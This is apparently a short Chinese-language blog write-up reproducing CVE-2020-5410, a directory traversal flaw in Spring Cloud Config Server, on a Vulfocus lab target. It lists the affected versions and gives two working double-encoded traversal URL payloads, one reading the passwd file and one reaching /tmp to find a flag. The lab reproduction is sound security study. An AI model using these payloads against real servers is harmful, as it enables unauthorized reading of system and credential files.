vulfocus复现CVE-2020-5410

Spring Cloud Config，2.2.3之前的2.2.x版本，2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求，这可能导致目录遍历攻击。受影响版本：Spring Cloud Config: 2.1.0 to 2.1.8，Spring Cloud Config: 2.2.0 to 2.2.2

启动靶机

构造poc：

/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fpasswd%23foo/development

将命令改成查看tmp文件夹的命令，因为flag一般都存在于tmp文件中

构造poc：

/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Ftmp%23foo/development

emm，第一次写博客，还望各位大牛多多指教，本文参考了xuzhiye大佬的写的wp。

Vulfocus

vulfocus复现CVE-2020-5410

相关

log4j2漏洞利用vulfocus-CVE-2021-44228

标签